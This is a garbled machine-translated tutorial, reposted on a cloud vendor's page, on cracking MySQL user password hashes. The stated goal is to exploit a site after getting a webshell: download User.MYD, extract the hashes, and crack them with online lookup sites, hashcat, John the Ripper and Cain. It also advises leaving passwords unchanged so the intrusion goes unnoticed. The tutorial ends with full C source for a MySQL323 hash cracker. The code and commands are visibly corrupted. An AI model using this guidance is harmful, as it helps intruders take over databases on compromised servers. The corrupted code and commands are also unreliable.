MySQL Database password hack

Source: Internet
Author: User
Tags diff mysql sha1 sha1 mysql command line ultraedit

It is of great significance to study the encryption and decryption of MySQL database in the course of network attack and defense. Imagine that once you have access to the site's permissions, if you can get the data stored in MySQL, through the decryption, you can access the database through the normal way, on the one hand, the direct operation of data in the database, On the other hand can be used to elevate permissions. In this paper, the common methods of MySQL password cracking are studied and discussed.


1.MySQL Database Password hack

MySQL database user password is the same as other database user password, in the application system code is in clear text appears, after obtaining the file Read permission can be directly read from the database connection file, For example, the ASP code in the Conn.asp database connection file, which generally contains the database type, physical location, user name and password information, and in MySQL, even if the database user (the root user except) to obtain a password, only one user's database can only operate data.

In the actual attack and defense process, in the case of acquiring Webshell, It is possible to download the MySQL database to keep the user's User.myd

file, the file is stored in the MySQL database for all users of the database password, as long as the ability to crack these passwords can be fair and square operation of these data, although there are many online to modify the MySQL database user password method, but not advisable, because the repair Change the user password thing is easy to be found!


1.1MYSQL Encryption method

MySQL Database authentication password There are two ways, MySQL 4.1 version is MYSQL323 encryption, MySQL 4.1 and later versions are MYSQLSHA1 encryption, MySQL database comes with old_ Password (str) and Password (str) functions, which can be queried in the MySQL database, the former is MYSQL323 encryption, the latter is MYSQLSHA1 mode encryption.

(1) Encrypt in MYSQL323 mode

Selectold_password (& #39;bbs.antian365.com& #39;);

Query Results mysql323= 10c886615b135b38

(2) Encrypt in MYSQLSHA1 mode

Selectpassword (& #39;bbs.antian365.com& #39;);

Query Results mysqlsha1= *A2EBAE36132928537ADA8E6D1F7C5C5886713CC2

As shown in result 1, the MYSQL323 encryption generates a 16-bit string, whereas in MYSQLSHA1 it is a 41-bit string, where * is not added to the actual cryptographic operation, by observing that many users are carrying "*", in the actual cracking process to remove the "*", That is to say, the actual number of MYSQLSHA1 encrypted passwords is 40 bits.

技术分享

Figure 1 in MySQL different sha for querying the same password in the database value

1.2MYSQL Database File Structure

1.MYSQL Database File types

MySQL database files have "frm", "MYD" "and myi" three kinds of files, ". frm" is a file that describes the structure of the table, ". MYD "is the data file for the table,". MYI "is the data tree of any index in the table data file. Typically there is a single folder, and the default is under the path "C:\Program files\mysql\mysql Server 5.0\data".

2.MYSQL Database user password file

All settings in the MYSQL database are saved by default in "C:\Program files\mysql\mysql Server 5.0\data\mysql", which is the data directory of the installer, as shown in 2, A total of three files for the user are user.frm, user. The MyD and User.myi,mysql database user passwords are stored in the User.myd file, including the root user and other user passwords.

技术分享

Figure 2 MYSQL Database user password file

1.3 Get MySQL Password hash value

1. Get the MySQL database user password encryption string

Open the User.myd file directly using the ULTRAEDIT-32 editor, open it using binary mode for viewing, 3, you can see that after the root user is a string of strings, select the strings to copy them into Notepad, these strings are user encrypted values, that is, the 506D1427F6F61696B45 01445c90624897266dae3. Attention:

(1) "*" After Root is not copied to the string.

(2) In some cases, you need to look back, otherwise you will not get the full MYSQLSHA1 password, in short, the correct number of passwords is 40 bits.

(3) If you are password cracking in John Theripper password cracker, you need to bring "*"!

技术分享

Gets the encrypted string

1.4 Website online password hack

1.ww.cmd5.com cracked. Will get the MySQL value in the cmd5.com Web site for query, MySQL password cracking is generally charged, successfully cracked a 0.1 yuan.

2.somd5.com cracked. Somd5.com is a free cracked web site behind, each time the hack needs to manually select the graphics code to crack, fast, good results, only one at a time, and the need to re-enter the verification code after a break.

1.5 hashcat hack Hashcat support a lot of crack algorithms, free open source software, the official website https://hashcat.net/hashcat/, crack command:

hashcat64.exe-m myql.hashpass.dict// cracked MySQL323 type

hashcat64.exe-m myql.hashpass.dict// cracked MYSQL4.1/MYSQL5 type

1.6 John the Ripper password hack John the Ripper:http://www.openwall.com/john/h/john179w2.zip, John Theripper In addition to the ability to crack Linux, but also to crack various forms of password, Under Kali test cracked MySQL password, 4 shown.

Echo*81f5e21e35407d884a6cd4a731aebfb6af209e1b>hashes.txt

John–format =MYSQL-SHA1 Hashes.txt

John–list=formats | grep MySQL//view algorithms that support MySQL password cracking

技术分享

Figure 4 test mysql password hack

1.7 using Cain to hack MySQL password

1. Add the MySQL user password string to the Cain hack list

using Cain & Abel to hack mysql database user password,Cain & Abel is a hack screen saver, pwl password, shared password, cache password, remote shared password, SMB password, support for VNC password decoding, Cisco Type-7 password decoding, Base64 password decoding, SQL Server 7.0/2000 password decoding, remote Desktop password decoding, Access database password decoding, Cisco PIX Firewall password decoding, Cisco MD5 decoding, NTLM Session security password decoding, IKE aggressive Mode Pre-shared keys password decoding, dialup password decoding, Remote Desktop password decoding and other comprehensive tools, can also be remotely cracked, can hang dictionary and brute force, its sniffer function is extremely powerful, almost can capture all account password, including FTP, HTTP, IMAP, POP3, SMB, TELNET, VNC, TDS, SMTP, Mskerb5-preauth, MSN, Radius-keys, Radius-users, ICQ, IKE aggressive Mode pre-shared KEYS Authentications and so on.

Cain & Abel is currently the latest version of 4.9.56, software:http://www.oxid.it/downloads/ca_setup.exe. Download Cain & After Abel , install it directly, then run it in Cain & Abel the main interface, click the "Cracker" tab, and then encrypt the user password string "506d1427f6f61696b4501445c90624897266dae3" Add to the Mysqlhashes hack list, 5, click "Add tolist", 6, and copy the string into the hash input box. Username can be entered arbitrarily.

技术分享

Figure 5 using Cain to hack the MySQL password main interface

技术分享

Figure 6 adding MySQL hashes

2. Use a dictionary to hack

7 , select the string you just added to crack, then select "Dictionary Attack(dictionary hack)" and select "MYSQL SHA1 hashes" in the popup menutohack, This approach is for MYSQL4.1 later versions, and for MYSQL4.1 Previous Versions select "MYSQL v3.23 hashes" to hack.

技术分享

Figure 7 Selecting the crack mode

Select Dictionaryattack "(Dictionary Crack)" will appear a window, mainly for the selection of dictionaries,8 , under dictionary Right-click, you can add one or more dictionary files, after the dictionary selection can be in the "options (Options), and then click the Startbutton to crack.

技术分享

Figure 8MYSQL dictionary hack settings

Description

in the options (option) "In a total of 8 type of method is:

(1 ) capitalize the first letter of the string

(2 ) string Inversion

(3 ) Double string

(4 ) string All lowercase

(5 ) string all uppercase

(6 ) to add a number to the string

(7 ) to rotate the uppercase in each string

(8 ) Add 2 to the string a number

after the successful crack Cain will give you some hints, as follows:

PlainText of user <none> Is DatabasePassWord

Attack stopped!

1 of 1 hashes cracked

indicates that the encrypted password is "DatabasePassWord" . Back to the Cain Hack main window , the cracked password value is automatically added to the "Password" column .

3. Crack Discussion

(1) Dictionary crack and Dictionary strength

Click "Start"-"Programs"-"MySQL"-"MySQL Server5.0"-"mysql command line Client" to open MySQL command lineclient, after entering the password, Enter the following code to reset a new password:

Usemysql

UpdateUser set Password=password ("1977-05-05") where user="root"; Flushprivileges;

In this experiment, the original password was modified to "1977-05-05".

Re-open the C:\ProgramFiles\MYSQL\MYSQL Server 5.0\data\mysql\user using the ULTRAEDIT-32 software again. MYD "Get its new password string" B046bbaf61fe3bb6f60ca99af39f5c2702f00d12 "and then re-select a dictionary, in this case choose the generated birthday dictionary, 11, Figure 12, just select the lowercase string to crack, Quickly get the results of the hack. The actual results show that using Cain to crack the MySQL password, if it is to use a dictionary to crack, then the crack effect is related to the dictionary strength, as long as the password in the dictionary, you will be able to crack.

Figure One again hack mysql password

Figure change mysql password after re-decoding the MySQL password

(2) using rainbow table to crack

in Cain also available in rainbow table hack MySQL , select "Cryptanalysisattack" in the hack mode-"MYSQL SHA1 hashes via Rainbowtables "Yes,as shown infigure , in the actual testing process because the SHA Rainbow Table formatprovided on the network is RTI, and The RT is used in the Cain and I will download all the rainbow tables in the file suffix by RTI Modify to RT , and then cracked, prompting the message display is not successful, should be a rainbow table format is not the same, Cain only to acknowledge its own offer.

Figure uses the rainbow table to crack the way

Figure using a rainbow table to crack

(3) Hash Calculator

in Cain various hashes are available in the calculation, click the Computer icon button in the main interface to eject the hashes calculator, in the "Text Tohash Enter the original value you want to convert, such as enter 12345678 , click the Calculate "for calculations,as shown in, you can see the values of the hashes .

Figure calculate the hashes value

(4) Create a rainbow table

in Cain the installation directory C:\ProgramFiles\Cain\Winrtgen runs directly in the Winrtgen , as shown in, this tool is a rainbow table generator, which makes it easy to generate various types of rainbow table values.

Figure winrtgen Rainbow Table Generation tool

(5) Set Rainbow table

Click "Add Table" in figure and select "MYSQLsha1 " in the hash in "Rainbowtable properties" , you can then set Min len, Max len, Index, Chain len, Chain Count , respectively, according to the actual situation. And the value of "N oftables", you only need to set the values for Min Len, Max Len,and N oftables. "N of Tables" is used primarily to test the completeness of the hashes generation, enter different values, and display percentages in the table properties. Try to determine how many tables you need to generate altogether, and then click Benchmarktomake a time estimate,as shown in, clickOK tocomplete the Rainbow Table generation settings.

Figure set Rainbow table

In the Rainbow Table Builder, Clickstart tocreate a rainbow table, and the status shows the size and progress of the build.

Chart start to create Rainbow table

because the rainbow table generation time is relatively long, there is no search on the network to RT end of MySQL sha1hashes table, so this crack mainly in the dictionary to crack the main, the Rainbow table will be in the crack after all generation, in the case of server permissions are not too strict, through the Webshell the MySQL can be fully the user under. MYD File download to local, as long as the root user password, and then the use of Webshell can do a lot of things, this article through the introduction of the online site, John theRipper, Hashcat solution, Cain to crack MySQL password, for the design of the MySQL password is not too complex , the crack is still relatively easy.

(6) for 16-bit MySQL password (MYSQL323 encryption algorithm) there is a fast way to crack, compile the following program, directly to crack, you can crack 8 digits, characters and other passwords.

How to use:

./mysqlfast6294b50f67eda209

The crack effect is shown in Figure19.

技术分享

/* This program is public domain. Share and enjoy.

* $ gcc-o2-fomit-frame-pointer Mysqlfast.c-o mysqlfast

* $ mysqlfast 6294b50f67eda209

* hash:6294b50f67eda209

*/

#include <stdio.h>

typedef unsigned long u32;

/* allowable characters in password; 33-126 is printable ASCII */

#define MIN_CHAR 33

#define MAX_CHAR 126

/* Maximum Length of password */

#define Max_len 12

#define MASK 0X7FFFFFFFL

int crack0 (int stop, u32 targ1, u32 targ2, int *pass_ary)

{

int I, C;

U32 D, E, Sum, step, diff, Div, xor1, Xor2, State1, State2;

U32 newstate1, Newstate2, Newstate3;

U32 state1_ary[max_len-2], state2_ary[max_len-2];

U32 xor_ary[max_len-3], step_ary[max_len-3];

i =-1;

sum = 7;

State1_ary[0] = 1345345333L;

State2_ary[0] = 0x12345671l;

while (1) {

while (I < stop) {

i++;

Pass_ary[i] = Min_char;

Step_ary[i] = (State1_ary[i] & 0x3f) + sum;

Xor_ary[i] = Step_ary[i]*min_char + (State1_ary[i] << 8);

sum + = Min_char;

STATE1_ARY[I+1] = State1_ary[i] ^ xor_ary[i];

STATE2_ARY[I+1] = State2_ary[i]

+ ((State2_ary[i] << 8) ^ state1_ary[i+1]);

}

State1 = state1_ary[i+1];

State2 = state2_ary[i+1];

Step = (State1 & 0x3f) + sum;

Xor1 = Step*min_char + (state1 << 8);

Xor2 = (state2 << 8) ^ state1;

for (c = Min_char; c <= Max_char; C + +, Xor1 + = Step) {

Newstate2 = State2 + (xor1 ^ xor2);

newstate1 = state1 ^ Xor1;

Newstate3 = (targ2–newstate2) ^ (Newstate2 << 8);

div = (Newstate1 & 0x3f) + sum + C;

diff = ((newstate3 ^ newstate1) – (newstate1 << 8)) & MASK;

if (diff% div! = 0) Continue;

D = diff/div;

if (d < Min_char | | d > Max_char) continue;

div = (Newstate3 & 0x3f) + sum + C + D;

diff = ((targ1 ^ newstate3) – (Newstate3 << 8)) & MASK;

if (diff% div! = 0) Continue;

e = Diff/div;

if (E < Min_char | | e > Max_char) continue;

PASS_ARY[I+1] = c;

PASS_ARY[I+2] = D;

PASS_ARY[I+3] = e;

return 1;

}

while (i >= 0 && pass_ary[i] >= Max_char) {

Sum-= Max_char;

I –

}

if (I < 0) break;

pass_ary[i]++;

Xor_ary[i] + = Step_ary[i];

sum++;

STATE1_ARY[I+1] = State1_ary[i] ^ xor_ary[i];

STATE2_ARY[I+1] = State2_ary[i]

+ ((State2_ary[i] << 8) ^ state1_ary[i+1]);

}

return 0;

}

void crack (char *hash)

{

int I, Len;

U32 targ1, Targ2, TARG3;

int Pass[max_len];

if (sscanf (hash, &quot;%8lx%lx&quot;, &TARG1, &targ2)! = 2) {

printf (&quot;invalid password hash:%s\n&quot;, hash);

Return

}

printf (&quot; Hash:%08lx%08lx\n&quot;, Targ1, TARG2);

TARG3 = TARG2–TARG1;

TARG3 = targ2– ((targ3 << 8) ^ targ1);

TARG3 = targ2– ((targ3 << 8) ^ targ1);

TARG3 = targ2– ((targ3 << 8) ^ targ1);

for (len = 3; Len <= Max_len; len++) {

printf (&quot; Trying length%d\n&quot; len);

if (Crack0 (len-4, Targ1, TARG3, pass)) {

printf (&quot; Found Pass: &quot;);

for (i = 0; i < len; i++)

Putchar (Pass[i]);

Putchar (& #39;\n& #39;);

Break

}

}

if (Len > Max_len)

printf (&quot; Pass not found\n&quot;);

}

int main (int argc, char *argv[])

{

int i;

if (argc <= 1)

printf (&quot;usage:%s hash\n&quot;, argv[0]);

for (i = 1; i < argc; i++)

Crack (Argv[i]);

return 0;

}

MySQL Database password hack

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.